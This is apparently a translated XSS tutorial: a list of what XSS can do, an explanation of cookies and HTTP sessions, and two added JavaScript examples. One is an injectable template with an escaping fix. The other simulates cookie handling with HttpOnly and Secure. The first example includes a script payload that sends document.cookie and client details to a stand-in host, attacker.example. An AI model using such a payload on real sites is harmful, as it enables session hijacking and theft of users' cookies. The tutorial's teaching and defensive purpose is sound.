[In-depth study of Web security] Exploiting XSS vulnerabilities in depth
Preface
Starting from this lesson, Xiaozhai has changed the layout again in the hope of giving you a better reading experience. The basic principle of XSS is HTML code injection: attacker-controlled text ends up in a page as markup and runs as script in the victim's browser. In this lesson we take a closer look at how XSS is actually exploited.
Analysis on XSS Exploitation Technology
What can XSS do?
Before studying XSS exploitation techniques, we need to know what XSS can do, that is, what harm it can cause:
· Tamper with the page (modify the displayed content)
· Phishing
· Steal user cookies
· Hijack user (browser) sessions
· Inject advertising and inflate traffic
· DDoS (using the victims' browsers as the attack source)
· Web page Trojans (drive-by downloads)
· Obtain client information (such as User-Agent, IP address and open ports)
· Spread an XSS worm
...
All of these can be done with XSS (some of them, of course, depend on the environment the XSS sits in, for example where the injection point is and what the victim's browser allows the script to reach).
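Two items in the list above, HTML code injection and cookie theft, are worth seeing together in code. The following is an added example written for this page, not code from the original post: a hypothetical server-side template (renderGreeting) that concatenates user input into HTML, the same template with output encoding, and the payload shape an attacker submits to ship document.cookie and client details to a collector. The names COLLECTOR, renderGreeting, buildExfilUrl and the fake document/navigator objects are all assumptions made for the example.

```javascript
// Added example (not from the original post): an HTML-injection point,
// its hardened form, and what a cookie-stealing payload does once it runs.
// COLLECTOR and every function name here are hypothetical.

const COLLECTOR = "https://attacker.example/collect"; // hypothetical attacker endpoint

// Vulnerable: the `name` parameter is concatenated straight into the HTML response.
function renderGreeting(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened: encode the HTML metacharacters before interpolating untrusted text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// Payload as it would be submitted in the `name` parameter. A new <img> whose
// src carries the cookie is enough: the request goes out cross-origin without
// any XHR/CORS restriction getting in the way.
const PAYLOAD =
  `<script>new Image().src="${COLLECTOR}?c="+encodeURIComponent(document.cookie);</script>`;

// True when the payload survived rendering as live markup rather than text.
function isInjected(html) {
  return html.includes("<script>");
}

// What the payload assembles inside the victim's page. `doc` and `nav` stand in
// for window.document / window.navigator so this runs outside a browser.
function buildExfilUrl(doc, nav, collector = COLLECTOR) {
  const params = new URLSearchParams({
    c: doc.cookie,            // empty string if every cookie carries HttpOnly
    ua: nav.userAgent,        // "obtain client information" from the list above
    loc: doc.location.href,
  });
  return `${collector}?${params.toString()}`;
}

// Constructed victim context (not captured from a real site).
const fakeDocument = {
  cookie: "PHPSESSID=abc123; theme=dark",
  location: { href: "https://victim.example/greet" },
};
const fakeNavigator = { userAgent: "Mozilla/5.0 (X11; Linux x86_64)" };

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderGreeting(PAYLOAD));     // payload lands as a live <script>
  console.log(renderGreetingSafe(PAYLOAD)); // payload rendered as harmless text
  console.log(buildExfilUrl(fakeDocument, fakeNavigator));
}
```

The hardened version only closes the HTML-body context shown here; text placed inside an attribute, a script block or a URL needs the encoding rules of that context instead. The HttpOnly comment in buildExfilUrl is the practical check: if the session cookie carries that flag, this payload still runs but reads nothing useful.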
What is a Cookie?
Before going further with XSS, let's look at what a browser cookie is. To talk about cookies we first have to talk about HTTP. Think of an ordinary C/S program: the client opens a connection to the server, the two sides exchange data for as long as they need, and the connection is closed when the conversation is over.
HTTP works differently. The client is a browser, and all communication happens as HTTP requests and HTTP responses: each request gets exactly one response, and that pair is the whole conversation. Once the response has been delivered the exchange is finished (the TCP connection may be reused for the next request, but nothing about the previous request carries over).
As we know, many web applications have a login function, that is, they need to recognize which user is talking to them. But if every request/response pair is a complete, finished exchange, how can a website manage a user session? How does it know which user sent a given request?
It does so with the cookie. Every time the browser sends an HTTP request it attaches a Cookie header, and the server sets cookies with a Set-Cookie header in a response.
To sum up: HTTP is stateless, so a website relies on the cookie (typically a session identifier) to recognize the user on every request.
We can view the cookies a website has given us in Chrome as follows (these steps follow the Chrome settings layout of the time; newer versions put the same list under Privacy and security):
1. Open "chrome://settings/":
2. At the bottom there is a "Show advanced settings..." link. Click it:
3. There is a "Privacy" section:
4. Under that heading there is a "Content settings" button. Click it:
5. Click the "All cookies and site data..." button to view the cookies of every website:
Each cookie is a Key=Value pair, for example:
Every time we access a domain, the browser writes the cookies belonging to that domain into the Cookie header of the HTTP request it sends there. When a domain wants to set a cookie for us, it writes it in the Set-Cookie header of the HTTP response.
How to set cookies in PHP
Start the apache2 service, go to the web root directory and create a file named cookietest.php with the following code:
Visit the page in a browser:
Right-click on the page and choose Inspect Element:
Open the Network tab in the toolbar, refresh the page, and find the HTTP request listed under Network:
Click the request:
You can see a Cookies tab. Click it:
We can now see the cookie carried in the HTTP request and the cookie set in the HTTP response.
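The exchange you see in the Network tab is the mechanism described in the cookie section above: a Set-Cookie header in one response, a Cookie header in every later request, and a server that keeps no state in the connection itself. The following is an added example written for this page in JavaScript (Node), not the page's cookietest.php and not code from the original post: serverHandle plays the role of the PHP script (it issues a session cookie and counts visits per session), and CookieJar plays the role of the browser. The cookie name PHPSESSID, the host victim.example, the sid values and every function and class name are assumptions made for the example.

```javascript
// Added example (not from the original post): a stateless server that issues a
// session cookie, and a browser-side cookie jar that stores it and sends it
// back, so independent request/response pairs share one session.
// All names here (SESSION_COOKIE, serverHandle, CookieJar, sidN) are hypothetical.

const SESSION_COOKIE = "PHPSESSID";
const sessions = new Map(); // server-side memory, keyed only by session id
let nextSid = 1;

// "a=1; b=2" -> { a: "1", b: "2" }
function parseCookieHeader(header) {
  const out = {};
  for (const part of (header || "").split(";")) {
    const i = part.indexOf("=");
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// req = { url, headers: { cookie?: string } }. Each call knows nothing of earlier ones.
function serverHandle(req) {
  const sid = parseCookieHeader(req.headers.cookie)[SESSION_COOKIE];
  if (sid && sessions.has(sid)) {
    const s = sessions.get(sid);
    s.visits += 1;
    return { status: 200, headers: {}, body: `visit ${s.visits}` };
  }
  // Unknown or absent cookie: start a new session and hand out its id.
  const fresh = `sid${nextSid++}`;
  sessions.set(fresh, { visits: 1 });
  return {
    status: 200,
    // HttpOnly hides the cookie from document.cookie (and so from an XSS payload);
    // Secure keeps it off plain-http requests.
    headers: { "set-cookie": [`${SESSION_COOKIE}=${fresh}; Path=/; HttpOnly; Secure`] },
    body: "visit 1",
  };
}

class CookieJar {
  constructor() { this.store = []; }

  // Parse each Set-Cookie header of a response received from `url`.
  storeFrom(response, url) {
    const u = new URL(url);
    for (const line of response.headers["set-cookie"] || []) {
      const [nameValue, ...attrs] = line.split(";").map(s => s.trim());
      const eq = nameValue.indexOf("=");
      const c = { name: nameValue.slice(0, eq), value: nameValue.slice(eq + 1),
                  domain: u.hostname, path: "/", secure: false, httpOnly: false };
      for (const a of attrs) {
        const [k, v = ""] = a.split("=");
        const key = k.toLowerCase();
        if (key === "path") c.path = v;
        else if (key === "domain") c.domain = v.replace(/^\./, "");
        else if (key === "secure") c.secure = true;
        else if (key === "httponly") c.httpOnly = true;
      }
      if (c.secure && u.protocol !== "https:") continue; // browsers reject Secure cookies set over http
      // A cookie with the same name/domain/path replaces the earlier one.
      this.store = this.store.filter(x => !(x.name === c.name && x.domain === c.domain && x.path === c.path));
      this.store.push(c);
    }
  }

  // Simplified matching: host-only vs Domain-attribute scoping is not modelled.
  matching(url) {
    const u = new URL(url);
    return this.store.filter(c =>
      (u.hostname === c.domain || u.hostname.endsWith("." + c.domain)) &&
      u.pathname.startsWith(c.path) &&
      (!c.secure || u.protocol === "https:"));
  }

  // Value of the Cookie request header the browser attaches for `url`.
  cookieHeaderFor(url) {
    return this.matching(url).map(c => `${c.name}=${c.value}`).join("; ");
  }

  // What document.cookie shows to page script: HttpOnly cookies are absent.
  documentCookie(url) {
    return this.matching(url).filter(c => !c.httpOnly).map(c => `${c.name}=${c.value}`).join("; ");
  }
}

// Drive several independent requests through one jar and report what each side saw.
function runExchange() {
  const jar = new CookieJar();
  const visit = url => {
    const req = { url, headers: {} };
    const cookie = jar.cookieHeaderFor(url);
    if (cookie) req.headers.cookie = cookie;
    const res = serverHandle(req);
    jar.storeFrom(res, url);
    return res.body;
  };
  return {
    first: visit("https://victim.example/cookietest.php"),     // "visit 1": Set-Cookie issued
    second: visit("https://victim.example/cookietest.php"),    // "visit 2": Cookie header sent back
    plainHttp: visit("http://victim.example/cookietest.php"),  // "visit 1": Secure cookie withheld
    third: visit("https://victim.example/cookietest.php"),     // "visit 3": original session continues
    scriptView: jar.documentCookie("https://victim.example/"), // "": HttpOnly hides it from script
    header: jar.cookieHeaderFor("https://victim.example/"),    // "PHPSESSID=sid..." as the browser sends it
  };
}
```

Calling runExchange() reproduces what the DevTools Cookies tab shows for cookietest.php: the first response carries Set-Cookie, every later request to the same origin carries Cookie. The plain-http visit and the documentCookie result are the two checks a practitioner cares about when assessing cookie theft via XSS: the Secure flag keeps the session id off cleartext requests, and HttpOnly keeps it out of document.cookie even though the page script still runs.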